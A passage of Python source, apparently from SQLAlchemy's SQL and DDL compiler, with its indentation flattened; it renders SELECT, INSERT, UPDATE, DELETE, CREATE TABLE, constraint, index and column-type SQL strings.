# if we hit an Alias or CompoundSelect, put a marker in the
# stack.
kw['transform_clue'] = 'select_container'
newelem._copy_internals(clone=visit, **kw)
elif newelem.is_selectable and newelem._is_select:
barrier_select = kw.get('transform_clue', None) == 'select_container'
# if we're still descended from an Alias/CompoundSelect, we're
# in a FROM clause, so start with a new translate collection
if barrier_select:
column_translate.append({})
kw['transform_clue'] = 'inside_select'
newelem._copy_internals(clone=visit, **kw)
if barrier_select:
del column_translate[-1]
else:
newelem._copy_internals(clone=visit, **kw)
return newelem
return visit(select)
def _transform_result_map_for_nested_joins(self, select, transformed_select):
inner_col = dict((c._key_label, c) for
c in transformed_select.inner_columns)
d = dict(
(inner_col[c._key_label], c)
for c in select.inner_columns
)
for key, (name, objs, typ) in list(self.result_map.items()):
objs = tuple([d.get(col, col) for col in objs])
self.result_map[key] = (name, objs, typ)
_default_stack_entry = util.immutabledict([
('iswrapper', False),
('correlate_froms', frozenset()),
('asfrom_froms', frozenset())
])
def _display_froms_for_select(self, select, asfrom):
# utility method to help external dialects
# get the correct from list for a select.
# specifically the oracle dialect needs this feature
# right now.
toplevel = not self.stack
entry = self._default_stack_entry if toplevel else self.stack[-1]
correlate_froms = entry['correlate_froms']
asfrom_froms = entry['asfrom_froms']
if asfrom:
froms = select._get_display_froms(
explicit_correlate_froms=\
correlate_froms.difference(asfrom_froms),
implicit_correlate_froms=())
else:
froms = select._get_display_froms(
explicit_correlate_froms=correlate_froms,
implicit_correlate_froms=asfrom_froms)
return froms
def visit_select(self, select, asfrom=False, parens=True,
iswrapper=False, fromhints=None,
compound_index=0,
force_result_map=False,
positional_names=None,
nested_join_translation=False,
**kwargs):
needs_nested_translation = \
select.use_labels and \
not nested_join_translation and \
not self.stack and \
not self.dialect.supports_right_nested_joins
if needs_nested_translation:
transformed_select = self._transform_select_for_nested_joins(select)
text = self.visit_select(
transformed_select, asfrom=asfrom, parens=parens,
iswrapper=iswrapper, fromhints=fromhints,
compound_index=compound_index,
force_result_map=force_result_map,
positional_names=positional_names,
nested_join_translation=True, **kwargs
)
toplevel = not self.stack
entry = self._default_stack_entry if toplevel else self.stack[-1]
populate_result_map = force_result_map or (
compound_index == 0 and (
toplevel or \
entry['iswrapper']
)
)
if needs_nested_translation:
if populate_result_map:
self._transform_result_map_for_nested_joins(
select, transformed_select)
return text
correlate_froms = entry['correlate_froms']
asfrom_froms = entry['asfrom_froms']
if asfrom:
froms = select._get_display_froms(
explicit_correlate_froms=
correlate_froms.difference(asfrom_froms),
implicit_correlate_froms=())
else:
froms = select._get_display_froms(
explicit_correlate_froms=correlate_froms,
implicit_correlate_froms=asfrom_froms)
new_correlate_froms = set(selectable._from_objects(*froms))
all_correlate_froms = new_correlate_froms.union(correlate_froms)
new_entry = {
'asfrom_froms': new_correlate_froms,
'iswrapper': iswrapper,
'correlate_froms': all_correlate_froms
}
self.stack.append(new_entry)
column_clause_args = kwargs.copy()
column_clause_args.update({
'positional_names': positional_names,
'within_label_clause': False,
'within_columns_clause': False
})
# the actual list of columns to print in the SELECT column list.
inner_columns = [
c for c in [
self._label_select_column(select,
column,
populate_result_map, asfrom,
column_clause_args,
name=name)
for name, column in select._columns_plus_names
]
if c is not None
]
text = "SELECT " # we're off to a good start !
if select._hints:
byfrom = dict([
(from_, hinttext % {
'name':from_._compiler_dispatch(
self, ashint=True)
})
for (from_, dialect), hinttext in
select._hints.items()
if dialect in ('*', self.dialect.name)
])
hint_text = self.get_select_hint_text(byfrom)
if hint_text:
text += hint_text + " "
if select._prefixes:
text += self._generate_prefixes(select, select._prefixes, **kwargs)
text += self.get_select_precolumns(select)
text += ', '.join(inner_columns)
if froms:
text += " \nFROM "
if select._hints:
text += ', '.join([f._compiler_dispatch(self,
asfrom=True, fromhints=byfrom,
**kwargs)
for f in froms])
else:
text += ', '.join([f._compiler_dispatch(self,
asfrom=True, **kwargs)
for f in froms])
else:
text += self.default_from()
if select._whereclause is not None:
t = select._whereclause._compiler_dispatch(self, **kwargs)
if t:
text += " \nWHERE " + t
if select._group_by_clause.clauses:
group_by = select._group_by_clause._compiler_dispatch(
self, **kwargs)
if group_by:
text += " GROUP BY " + group_by
if select._having is not None:
t = select._having._compiler_dispatch(self, **kwargs)
if t:
text += " \nHAVING " + t
if select._order_by_clause.clauses:
if self.dialect.supports_simple_order_by_label:
order_by_select = select
else:
order_by_select = None
text += self.order_by_clause(select,
order_by_select=order_by_select, **kwargs)
if select._limit is not None or select._offset is not None:
text += self.limit_clause(select)
if select._for_update_arg is not None:
text += self.for_update_clause(select)
if self.ctes and \
compound_index == 0 and toplevel:
text = self._render_cte_clause() + text
self.stack.pop(-1)
if asfrom and parens:
return "(" + text + ")"
else:
return text
def _generate_prefixes(self, stmt, prefixes, **kw):
clause = " ".join(
prefix._compiler_dispatch(self, **kw)
for prefix, dialect_name in prefixes
if dialect_name is None or
dialect_name == self.dialect.name
)
if clause:
clause += " "
return clause
def _render_cte_clause(self):
if self.positional:
self.positiontup = self.cte_positional + self.positiontup
cte_text = self.get_cte_preamble(self.ctes_recursive) + " "
cte_text += ", \n".join(
[txt for txt in self.ctes.values()]
)
cte_text += "\n "
return cte_text
def get_cte_preamble(self, recursive):
if recursive:
return "WITH RECURSIVE"
else:
return "WITH"
def get_select_precolumns(self, select):
"""Called when building a ``SELECT`` statement, position is just
before column list.
"""
return select._distinct and "DISTINCT " or ""
def order_by_clause(self, select, **kw):
order_by = select._order_by_clause._compiler_dispatch(self, **kw)
if order_by:
return " ORDER BY " + order_by
else:
return ""
def for_update_clause(self, select):
return " FOR UPDATE"
def returning_clause(self, stmt, returning_cols):
raise exc.CompileError(
"RETURNING is not supported by this "
"dialect's statement compiler.")
def limit_clause(self, select):
text = ""
if select._limit is not None:
text += "\n LIMIT " + self.process(elements.literal(select._limit))
if select._offset is not None:
if select._limit is None:
text += "\n LIMIT -1"
text += " OFFSET " + self.process(elements.literal(select._offset))
return text
def visit_table(self, table, asfrom=False, iscrud=False, ashint=False,
fromhints=None, **kwargs):
if asfrom or ashint:
if getattr(table, "schema", None):
ret = self.preparer.quote_schema(table.schema) + \
"." + self.preparer.quote(table.name)
else:
ret = self.preparer.quote(table.name)
if fromhints and table in fromhints:
ret = self.format_from_hint_text(ret, table,
fromhints[table], iscrud)
return ret
else:
return ""
def visit_join(self, join, asfrom=False, **kwargs):
return (
join.left._compiler_dispatch(self, asfrom=True, **kwargs) +
(join.isouter and " LEFT OUTER JOIN " or " JOIN ") +
join.right._compiler_dispatch(self, asfrom=True, **kwargs) +
" ON " +
join.onclause._compiler_dispatch(self, **kwargs)
)
def visit_insert(self, insert_stmt, **kw):
self.isinsert = True
colparams = self._get_colparams(insert_stmt, **kw)
if not colparams and \
not self.dialect.supports_default_values and \
not self.dialect.supports_empty_insert:
raise exc.CompileError("The '%s' dialect with current database "
"version settings does not support empty "
"inserts." %
self.dialect.name)
if insert_stmt._has_multi_parameters:
if not self.dialect.supports_multivalues_insert:
raise exc.CompileError("The '%s' dialect with current database "
"version settings does not support "
"in-place multirow inserts." %
self.dialect.name)
colparams_single = colparams[0]
else:
colparams_single = colparams
preparer = self.preparer
supports_default_values = self.dialect.supports_default_values
text = "INSERT "
if insert_stmt._prefixes:
text += self._generate_prefixes(insert_stmt,
insert_stmt._prefixes, **kw)
text += "INTO "
table_text = preparer.format_table(insert_stmt.table)
if insert_stmt._hints:
dialect_hints = dict([
(table, hint_text)
for (table, dialect), hint_text in
insert_stmt._hints.items()
if dialect in ('*', self.dialect.name)
])
if insert_stmt.table in dialect_hints:
table_text = self.format_from_hint_text(
table_text,
insert_stmt.table,
dialect_hints[insert_stmt.table],
True
)
text += table_text
if colparams_single or not supports_default_values:
text += " (%s)" % ', '.join([preparer.format_column(c[0])
for c in colparams_single])
if self.returning or insert_stmt._returning:
self.returning = self.returning or insert_stmt._returning
returning_clause = self.returning_clause(
insert_stmt, self.returning)
if self.returning_precedes_values:
text += " " + returning_clause
if insert_stmt.select is not None:
text += " %s" % self.process(insert_stmt.select, **kw)
elif not colparams and supports_default_values:
text += " DEFAULT VALUES"
elif insert_stmt._has_multi_parameters:
text += " VALUES %s" % (
", ".join(
"(%s)" % (
', '.join(c[1] for c in colparam_set)
)
for colparam_set in colparams
)
)
else:
text += " VALUES (%s)" % \
', '.join([c[1] for c in colparams])
if self.returning and not self.returning_precedes_values:
text += " " + returning_clause
return text
def update_limit_clause(self, update_stmt):
"""Provide a hook for MySQL to add LIMIT to the UPDATE"""
return None
def update_tables_clause(self, update_stmt, from_table,
extra_froms, **kw):
"""Provide a hook to override the initial table clause
in an UPDATE statement.
MySQL overrides this.
"""
return from_table._compiler_dispatch(self, asfrom=True,
iscrud=True, **kw)
def update_from_clause(self, update_stmt,
from_table, extra_froms,
from_hints,
**kw):
"""Provide a hook to override the generation of an
UPDATE..FROM clause.
MySQL and MSSQL override this.
"""
return "FROM " + ', '.join(
t._compiler_dispatch(self, asfrom=True,
fromhints=from_hints, **kw)
for t in extra_froms)
def visit_update(self, update_stmt, **kw):
self.stack.append(
{'correlate_froms': set([update_stmt.table]),
"iswrapper": False,
"asfrom_froms": set([update_stmt.table])})
self.isupdate = True
extra_froms = update_stmt._extra_froms
text = "UPDATE "
if update_stmt._prefixes:
text += self._generate_prefixes(update_stmt,
update_stmt._prefixes, **kw)
table_text = self.update_tables_clause(update_stmt, update_stmt.table,
extra_froms, **kw)
colparams = self._get_colparams(update_stmt, **kw)
if update_stmt._hints:
dialect_hints = dict([
(table, hint_text)
for (table, dialect), hint_text in
update_stmt._hints.items()
if dialect in ('*', self.dialect.name)
])
if update_stmt.table in dialect_hints:
table_text = self.format_from_hint_text(
table_text,
update_stmt.table,
dialect_hints[update_stmt.table],
True
)
else:
dialect_hints = None
text += table_text
text += ' SET '
include_table = extra_froms and \
self.render_table_with_column_in_update_from
text += ', '.join(
c[0]._compiler_dispatch(self,
include_table=include_table) +
'=' + c[1] for c in colparams
)
if self.returning or update_stmt._returning:
if not self.returning:
self.returning = update_stmt._returning
if self.returning_precedes_values:
text += " " + self.returning_clause(
update_stmt, self.returning)
if extra_froms:
extra_from_text = self.update_from_clause(
update_stmt,
update_stmt.table,
extra_froms,
dialect_hints, **kw)
if extra_from_text:
text += " " + extra_from_text
if update_stmt._whereclause is not None:
text += " WHERE " + self.process(update_stmt._whereclause)
limit_clause = self.update_limit_clause(update_stmt)
if limit_clause:
text += " " + limit_clause
if self.returning and not self.returning_precedes_values:
text += " " + self.returning_clause(
update_stmt, self.returning)
self.stack.pop(-1)
return text
def _create_crud_bind_param(self, col, value, required=False, name=None):
if name is None:
name = col.key
bindparam = elements.BindParameter(name, value,
type_=col.type, required=required)
bindparam._is_crud = True
return bindparam._compiler_dispatch(self)
@util.memoized_property
def _key_getters_for_crud_column(self):
if self.isupdate and self.statement._extra_froms:
# when extra tables are present, refer to the columns
# in those extra tables as table-qualified, including in
# dictionaries and when rendering bind param names.
# the "main" table of the statement remains unqualified,
# allowing the most compatibility with a non-multi-table
# statement.
_et = set(self.statement._extra_froms)
def _column_as_key(key):
str_key = elements._column_as_key(key)
if hasattr(key, 'table') and key.table in _et:
return (key.table.name, str_key)
else:
return str_key
def _getattr_col_key(col):
if col.table in _et:
return (col.table.name, col.key)
else:
return col.key
def _col_bind_name(col):
if col.table in _et:
return "%s_%s" % (col.table.name, col.key)
else:
return col.key
else:
_column_as_key = elements._column_as_key
_getattr_col_key = _col_bind_name = operator.attrgetter("key")
return _column_as_key, _getattr_col_key, _col_bind_name
def _get_colparams(self, stmt, **kw):
"""create a set of tuples representing column/string pairs for use
in an INSERT or UPDATE statement.
Also generates the Compiled object's postfetch, prefetch, and
returning column collections, used for default handling and ultimately
populating the ResultProxy's prefetch_cols() and postfetch_cols()
collections.
"""
self.postfetch = []
self.prefetch = []
self.returning = []
# no parameters in the statement, no parameters in the
# compiled params - return binds for all columns
if self.column_keys is None and stmt.parameters is None:
return [
(c, self._create_crud_bind_param(c,
None, required=True))
for c in stmt.table.columns
]
if stmt._has_multi_parameters:
stmt_parameters = stmt.parameters[0]
else:
stmt_parameters = stmt.parameters
# getters - these are normally just column.key,
# but in the case of mysql multi-table update, the rules for
# .key must conditionally take tablename into account
_column_as_key, _getattr_col_key, _col_bind_name = \
self._key_getters_for_crud_column
# if we have statement parameters - set defaults in the
# compiled params
if self.column_keys is None:
parameters = {}
else:
parameters = dict((_column_as_key(key), REQUIRED)
for key in self.column_keys
if not stmt_parameters or
key not in stmt_parameters)
# create a list of column assignment clauses as tuples
values = []
if stmt_parameters is not None:
for k, v in stmt_parameters.items():
colkey = _column_as_key(k)
if colkey is not None:
parameters.setdefault(colkey, v)
else:
# a non-Column expression on the left side;
# add it to values() in an "as-is" state,
# coercing right side to bound param
if elements._is_literal(v):
v = self.process(
elements.BindParameter(None, v, type_=k.type),
**kw)
else:
v = self.process(v.self_group(), **kw)
values.append((k, v))
need_pks = self.isinsert and \
not self.inline and \
not stmt._returning
implicit_returning = need_pks and \
self.dialect.implicit_returning and \
stmt.table.implicit_returning
if self.isinsert:
implicit_return_defaults = implicit_returning and stmt._return_defaults
elif self.isupdate:
implicit_return_defaults = self.dialect.implicit_returning and \
stmt.table.implicit_returning and \
stmt._return_defaults
if implicit_return_defaults:
if stmt._return_defaults is True:
implicit_return_defaults = set(stmt.table.c)
else:
implicit_return_defaults = set(stmt._return_defaults)
postfetch_lastrowid = need_pks and self.dialect.postfetch_lastrowid
check_columns = {}
# special logic that only occurs for multi-table UPDATE
# statements
if self.isupdate and stmt._extra_froms and stmt_parameters:
normalized_params = dict(
(elements._clause_element_as_expr(c), param)
for c, param in stmt_parameters.items()
)
affected_tables = set()
for t in stmt._extra_froms:
for c in t.c:
if c in normalized_params:
affected_tables.add(t)
check_columns[_getattr_col_key(c)] = c
value = normalized_params[c]
if elements._is_literal(value):
value = self._create_crud_bind_param(
c, value, required=value is REQUIRED,
name=_col_bind_name(c))
else:
self.postfetch.append(c)
value = self.process(value.self_group(), **kw)
values.append((c, value))
# determine tables which are actually
# to be updated - process onupdate and
# server_onupdate for these
for t in affected_tables:
for c in t.c:
if c in normalized_params:
continue
elif c.onupdate is not None and not c.onupdate.is_sequence:
if c.onupdate.is_clause_element:
values.append(
(c, self.process(
c.onupdate.arg.self_group(),
**kw)
)
)
self.postfetch.append(c)
else:
values.append(
(c, self._create_crud_bind_param(
c, None, name=_col_bind_name(c)
)
)
)
self.prefetch.append(c)
elif c.server_onupdate is not None:
self.postfetch.append(c)
if self.isinsert and stmt.select_names:
# for an insert from select, we can only use names that
# are given, so only select for those names.
cols = (stmt.table.c[_column_as_key(name)]
for name in stmt.select_names)
else:
# iterate through all table columns to maintain
# ordering, even for those cols that aren't included
cols = stmt.table.columns
for c in cols:
col_key = _getattr_col_key(c)
if col_key in parameters and col_key not in check_columns:
value = parameters.pop(col_key)
if elements._is_literal(value):
value = self._create_crud_bind_param(
c, value, required=value is REQUIRED,
name=_col_bind_name(c)
if not stmt._has_multi_parameters
else "%s_0" % _col_bind_name(c)
)
else:
if isinstance(value, elements.BindParameter) and \
value.type._isnull:
value = value._clone()
value.type = c.type
if c.primary_key and implicit_returning:
self.returning.append(c)
value = self.process(value.self_group(), **kw)
elif implicit_return_defaults and \
c in implicit_return_defaults:
self.returning.append(c)
value = self.process(value.self_group(), **kw)
else:
self.postfetch.append(c)
value = self.process(value.self_group(), **kw)
values.append((c, value))
elif self.isinsert:
if c.primary_key and \
need_pks and \
(
implicit_returning or
not postfetch_lastrowid or
c is not stmt.table._autoincrement_column
):
if implicit_returning:
if c.default is not None:
if c.default.is_sequence:
if self.dialect.supports_sequences and \
(not c.default.optional or \
not self.dialect.sequences_optional):
proc = self.process(c.default, **kw)
values.append((c, proc))
self.returning.append(c)
elif c.default.is_clause_element:
values.append(
(c,
self.process(c.default.arg.self_group(), **kw))
)
self.returning.append(c)
else:
values.append(
(c, self._create_crud_bind_param(c, None))
)
self.prefetch.append(c)
else:
self.returning.append(c)
else:
if (
c.default is not None and
(
not c.default.is_sequence or
self.dialect.supports_sequences
)
) or \
c is stmt.table._autoincrement_column and (
self.dialect.supports_sequences or
self.dialect.preexecute_autoincrement_sequences
):
values.append(
(c, self._create_crud_bind_param(c, None))
)
self.prefetch.append(c)
elif c.default is not None:
if c.default.is_sequence:
if self.dialect.supports_sequences and \
(not c.default.optional or \
not self.dialect.sequences_optional):
proc = self.process(c.default, **kw)
values.append((c, proc))
if implicit_return_defaults and \
c in implicit_return_defaults:
self.returning.append(c)
elif not c.primary_key:
self.postfetch.append(c)
elif c.default.is_clause_element:
values.append(
(c, self.process(c.default.arg.self_group(), **kw))
)
if implicit_return_defaults and \
c in implicit_return_defaults:
self.returning.append(c)
elif not c.primary_key:
# dont add primary key column to postfetch
self.postfetch.append(c)
else:
values.append(
(c, self._create_crud_bind_param(c, None))
)
self.prefetch.append(c)
elif c.server_default is not None:
if implicit_return_defaults and \
c in implicit_return_defaults:
self.returning.append(c)
elif not c.primary_key:
self.postfetch.append(c)
elif implicit_return_defaults and \
c in implicit_return_defaults:
self.returning.append(c)
elif self.isupdate:
if c.onupdate is not None and not c.onupdate.is_sequence:
if c.onupdate.is_clause_element:
values.append(
(c, self.process(c.onupdate.arg.self_group(), **kw))
)
if implicit_return_defaults and \
c in implicit_return_defaults:
self.returning.append(c)
else:
self.postfetch.append(c)
else:
values.append(
(c, self._create_crud_bind_param(c, None))
)
self.prefetch.append(c)
elif c.server_onupdate is not None:
if implicit_return_defaults and \
c in implicit_return_defaults:
self.returning.append(c)
else:
self.postfetch.append(c)
elif implicit_return_defaults and \
c in implicit_return_defaults:
self.returning.append(c)
if parameters and stmt_parameters:
check = set(parameters).intersection(
_column_as_key(k) for k in stmt.parameters
).difference(check_columns)
if check:
raise exc.CompileError(
"Unconsumed column names: %s" %
(", ".join("%s" % c for c in check))
)
if stmt._has_multi_parameters:
values_0 = values
values = [values]
values.extend(
[
(
c,
self._create_crud_bind_param(
c, row[c.key],
name="%s_%d" % (c.key, i + 1)
)
if c.key in row else param
)
for (c, param) in values_0
]
for i, row in enumerate(stmt.parameters[1:])
)
return values
def visit_delete(self, delete_stmt, **kw):
self.stack.append({'correlate_froms': set([delete_stmt.table]),
"iswrapper": False,
"asfrom_froms": set([delete_stmt.table])})
self.isdelete = True
text = "DELETE "
if delete_stmt._prefixes:
text += self._generate_prefixes(delete_stmt,
delete_stmt._prefixes, **kw)
text += "FROM "
table_text = delete_stmt.table._compiler_dispatch(self,
asfrom=True, iscrud=True)
if delete_stmt._hints:
dialect_hints = dict([
(table, hint_text)
for (table, dialect), hint_text in
delete_stmt._hints.items()
if dialect in ('*', self.dialect.name)
])
if delete_stmt.table in dialect_hints:
table_text = self.format_from_hint_text(
table_text,
delete_stmt.table,
dialect_hints[delete_stmt.table],
True
)
else:
dialect_hints = None
text += table_text
if delete_stmt._returning:
self.returning = delete_stmt._returning
if self.returning_precedes_values:
text += " " + self.returning_clause(
delete_stmt, delete_stmt._returning)
if delete_stmt._whereclause is not None:
text += " WHERE "
text += delete_stmt._whereclause._compiler_dispatch(self)
if self.returning and not self.returning_precedes_values:
text += " " + self.returning_clause(
delete_stmt, delete_stmt._returning)
self.stack.pop(-1)
return text
def visit_savepoint(self, savepoint_stmt):
return "SAVEPOINT %s" % self.preparer.format_savepoint(savepoint_stmt)
def visit_rollback_to_savepoint(self, savepoint_stmt):
return "ROLLBACK TO SAVEPOINT %s" % \
self.preparer.format_savepoint(savepoint_stmt)
def visit_release_savepoint(self, savepoint_stmt):
return "RELEASE SAVEPOINT %s" % \
self.preparer.format_savepoint(savepoint_stmt)
class DDLCompiler(Compiled):
@util.memoized_property
def sql_compiler(self):
return self.dialect.statement_compiler(self.dialect, None)
@util.memoized_property
def type_compiler(self):
return self.dialect.type_compiler
@property
def preparer(self):
return self.dialect.identifier_preparer
def construct_params(self, params=None):
return None
def visit_ddl(self, ddl, **kwargs):
# table events can substitute table and schema name
context = ddl.context
if isinstance(ddl.target, schema.Table):
context = context.copy()
preparer = self.dialect.identifier_preparer
path = preparer.format_table_seq(ddl.target)
if len(path) == 1:
table, sch = path[0], ''
else:
table, sch = path[-1], path[0]
context.setdefault('table', table)
context.setdefault('schema', sch)
context.setdefault('fullname', preparer.format_table(ddl.target))
return self.sql_compiler.post_process_text(ddl.statement % context)
def visit_create_schema(self, create):
schema = self.preparer.format_schema(create.element)
return "CREATE SCHEMA " + schema
def visit_drop_schema(self, drop):
schema = self.preparer.format_schema(drop.element)
text = "DROP SCHEMA " + schema
if drop.cascade:
text += " CASCADE"
return text
def visit_create_table(self, create):
table = create.element
preparer = self.dialect.identifier_preparer
text = "\n" + " ".join(['CREATE'] + \
table._prefixes + \
['TABLE',
preparer.format_table(table),
"("])
separator = "\n"
# if only one primary key, specify it along with the column
first_pk = False
for create_column in create.columns:
column = create_column.element
try:
processed = self.process(create_column,
first_pk=column.primary_key
and not first_pk)
if processed is not None:
text += separator
separator = ", \n"
text += "\t" + processed
if column.primary_key:
first_pk = True
except exc.CompileError as ce:
util.raise_from_cause(
exc.CompileError(util.u("(in table '%s', column '%s'): %s") % (
table.description,
column.name,
ce.args[0]
)))
const = self.create_table_constraints(table)
if const:
text += ", \n\t" + const
text += "\n)%s\n\n" % self.post_create_table(table)
return text
def visit_create_column(self, create, first_pk=False):
column = create.element
if column.system:
return None
text = self.get_column_specification(
column,
first_pk=first_pk
)
const = " ".join(self.process(constraint) \
for constraint in column.constraints)
if const:
text += " " + const
return text
def create_table_constraints(self, table):
# On some DB order is significant: visit PK first, then the
# other constraints (engine.ReflectionTest.testbasic failed on FB2)
constraints = []
if table.primary_key:
constraints.append(table.primary_key)
constraints.extend([c for c in table._sorted_constraints
if c is not table.primary_key])
return ", \n\t".join(p for p in
(self.process(constraint)
for constraint in constraints
if (
constraint._create_rule is None or
constraint._create_rule(self))
and (
not self.dialect.supports_alter or
not getattr(constraint, 'use_alter', False)
)) if p is not None
)
def visit_drop_table(self, drop):
return "\nDROP TABLE " + self.preparer.format_table(drop.element)
def visit_drop_view(self, drop):
return "\nDROP VIEW " + self.preparer.format_table(drop.element)
def _verify_index_table(self, index):
if index.table is None:
raise exc.CompileError("Index '%s' is not associated "
"with any table." % index.name)
def visit_create_index(self, create, include_schema=False,
include_table_schema=True):
index = create.element
self._verify_index_table(index)
preparer = self.preparer
text = "CREATE "
if index.unique:
text += "UNIQUE "
text += "INDEX %s ON %s (%s)" \
% (
self._prepared_index_name(index,
include_schema=include_schema),
preparer.format_table(index.table,
use_schema=include_table_schema),
', '.join(
self.sql_compiler.process(expr,
include_table=False, literal_binds=True) for
expr in index.expressions)
)
return text
def visit_drop_index(self, drop):
index = drop.element
return "\nDROP INDEX " + self._prepared_index_name(index,
include_schema=True)
def _prepared_index_name(self, index, include_schema=False):
if include_schema and index.table is not None and index.table.schema:
schema = index.table.schema
schema_name = self.preparer.quote_schema(schema)
else:
schema_name = None
ident = index.name
if isinstance(ident, elements._truncated_label):
max_ = self.dialect.max_index_name_length or \
self.dialect.max_identifier_length
if len(ident) > max_:
ident = ident[0:max_ - 8] + \
"_" + util.md5_hex(ident)[-4:]
else:
self.dialect.validate_identifier(ident)
index_name = self.preparer.quote(ident)
if schema_name:
index_name = schema_name + "." + index_name
return index_name
def visit_add_constraint(self, create):
return "ALTER TABLE %s ADD %s" % (
self.preparer.format_table(create.element.table),
self.process(create.element)
)
def visit_create_sequence(self, create):
text = "CREATE SEQUENCE %s" % \
self.preparer.format_sequence(create.element)
if create.element.increment is not None:
text += " INCREMENT BY %d" % create.element.increment
if create.element.start is not None:
text += " START WITH %d" % create.element.start
return text
def visit_drop_sequence(self, drop):
return "DROP SEQUENCE %s" % \
self.preparer.format_sequence(drop.element)
def visit_drop_constraint(self, drop):
return "ALTER TABLE %s DROP CONSTRAINT %s%s" % (
self.preparer.format_table(drop.element.table),
self.preparer.format_constraint(drop.element),
drop.cascade and " CASCADE" or ""
)
def get_column_specification(self, column, **kwargs):
colspec = self.preparer.format_column(column) + " " + \
self.dialect.type_compiler.process(column.type)
default = self.get_column_default_string(column)
if default is not None:
colspec += " DEFAULT " + default
if not column.nullable:
colspec += " NOT NULL"
return colspec
def post_create_table(self, table):
return ''
def get_column_default_string(self, column):
if isinstance(column.server_default, schema.DefaultClause):
if isinstance(column.server_default.arg, util.string_types):
return "'%s'" % column.server_default.arg
else:
return self.sql_compiler.process(column.server_default.arg)
else:
return None
def visit_check_constraint(self, constraint):
text = ""
if constraint.name is not None:
text += "CONSTRAINT %s " % \
self.preparer.format_constraint(constraint)
text += "CHECK (%s)" % self.sql_compiler.process(constraint.sqltext,
include_table=False,
literal_binds=True)
text += self.define_constraint_deferrability(constraint)
return text
def visit_column_check_constraint(self, constraint):
text = ""
if constraint.name is not None:
text += "CONSTRAINT %s " % \
self.preparer.format_constraint(constraint)
text += "CHECK (%s)" % constraint.sqltext
text += self.define_constraint_deferrability(constraint)
return text
def visit_primary_key_constraint(self, constraint):
if len(constraint) == 0:
return ''
text = ""
if constraint.name is not None:
text += "CONSTRAINT %s " % \
self.preparer.format_constraint(constraint)
text += "PRIMARY KEY "
text += "(%s)" % ', '.join(self.preparer.quote(c.name)
for c in constraint)
text += self.define_constraint_deferrability(constraint)
return text
def visit_foreign_key_constraint(self, constraint):
preparer = self.dialect.identifier_preparer
text = ""
if constraint.name is not None:
text += "CONSTRAINT %s " % \
preparer.format_constraint(constraint)
remote_table = list(constraint._elements.values())[0].column.table
text += "FOREIGN KEY(%s) REFERENCES %s (%s)" % (
', '.join(preparer.quote(f.parent.name)
for f in constraint._elements.values()),
self.define_constraint_remote_table(
constraint, remote_table, preparer),
', '.join(preparer.quote(f.column.name)
for f in constraint._elements.values())
)
text += self.define_constraint_match(constraint)
text += self.define_constraint_cascades(constraint)
text += self.define_constraint_deferrability(constraint)
return text
def define_constraint_remote_table(self, constraint, table, preparer):
"""Format the remote table clause of a CREATE CONSTRAINT clause."""
return preparer.format_table(table)
def visit_unique_constraint(self, constraint):
if len(constraint) == 0:
return ''
text = ""
if constraint.name is not None:
text += "CONSTRAINT %s " % \
self.preparer.format_constraint(constraint)
text += "UNIQUE (%s)" % (
', '.join(self.preparer.quote(c.name)
for c in constraint))
text += self.define_constraint_deferrability(constraint)
return text
def define_constraint_cascades(self, constraint):
text = ""
if constraint.ondelete is not None:
text += " ON DELETE %s" % constraint.ondelete
if constraint.onupdate is not None:
text += " ON UPDATE %s" % constraint.onupdate
return text
def define_constraint_deferrability(self, constraint):
text = ""
if constraint.deferrable is not None:
if constraint.deferrable:
text += " DEFERRABLE"
else:
text += " NOT DEFERRABLE"
if constraint.initially is not None:
text += " INITIALLY %s" % constraint.initially
return text
def define_constraint_match(self, constraint):
text = ""
if constraint.match is not None:
text += " MATCH %s" % constraint.match
return text
class GenericTypeCompiler(TypeCompiler):
def visit_FLOAT(self, type_):
return "FLOAT"
def visit_REAL(self, type_):
return "REAL"
def visit_NUMERIC(self, type_):
if type_.precision is None:
return "NUMERIC"
elif type_.scale is None:
return "NUMERIC(%(precision)s)" % \
{'precision': type_.precision}
else:
return "NUMERIC(%(precision)s, %(scale)s)" % \
{'precision': type_.precision,
'scale': type_.scale}
def visit_DECIMAL(self, type_):
if type_.precision is None:
return "DECIMAL"
elif type_.scale is None:
return "DECIMAL(%(precision)s)" % \
{'precision': type_.precision}
else:
return "DECIMAL(%(precision)s, %(scale)s)" % \
{'precision': type_.precision,
'scale': type_.scale}
def visit_INTEGER(self, type_):
return "INTEGER"
def visit_SMALLINT(self, type_):
return "SMALLINT"
def visit_BIGINT(self, type_):
return "BIGINT"
def visit_TIMESTAMP(self, type_):
return 'TIMESTAMP'
def visit_DATETIME(self, type_):
return "DATETIME"
def visit_DATE(self, type_):
return "DATE"
def visit_TIME(self, type_):
return "TIME"
def visit_CLOB(self, type_):
return "CLOB"
def visit_NCLOB(self, type_):
return "NCLOB"
def _render_string_type(self, type_, name):
text = name
if type_.length:
text += "(%d)" % type_.length
if type_.collation:
text += ' COLLATE "%s"' % type_.collation
return text
def visit_CHAR(self, type_):
return self._render_string_type(type_, "CHAR")
def visit_NCHAR(self, type_):
return self._render_string_type(type_, "NCHAR")
def visit_VARCHAR(self, type_):
return self._render_string_type(type_, "VARCHAR")
def visit_NVARCHAR(self, type_):
return self._render_string_type(type_, "NVARCHAR")
def visit_TEXT(self, type_):
return self._render_string_type(type_, "TEXT")
def visit_BLOB(self, type_):
return "BLOB"
def visit_BINARY(self, type_):
return "BINARY" + (type_.length and "(%d)" % type_.length or "")
def visit_VARBINARY(self, type_):
return "VARBINARY" + (type_.length and "(%d)" % type_.length or "")
def visit_BOOLEAN(self, type_):
return "BOOLEAN"
def visit_large_binary(self, type_):
return self.visit_BLOB(type_)
def visit_boolean(self, type_):
return self.visit_BOOLEAN(type_)
def visit_time(self, type_):
return self.visit_TIME(type_)
def visit_datetime(self, type_):
return self.visit_DATETIME(type_)
def visit_date(self, type_):
return self.visit_DATE(type_)
def visit_big_integer(self, type_):
return self.visit_BIGINT(type_)
def visit_small_integer(self, type_):
return self.visit_SMALLINT(type_)
def visit_integer(self, type_):
return self.visit_INTEGER(type_)
def visit_real(self, type_):
return self.visit_REAL(type_)
def visit_float(self, type_):
return self.visit_FLOAT(type_)
def visit_numeric(self, type_):
return self.visit_NUMERIC(type_)
def visit_string(self, type_):
return self.visit_VARCHAR(type_)
def visit_unicode(self, type_):
return self.visit_VARCHAR(type_)
def visit_text(self, type_):
return self.visit_TEXT(type_)
def visit_unicode_text(self, type_):
return self.visit_TEXT(type_)
def visit_enum(self, type_):
return self.visit_VARCHAR(type_)
def visit_null(self, type_):
raise exc.CompileError("Can't generate DDL for %r; "
"did you forget to specify a "
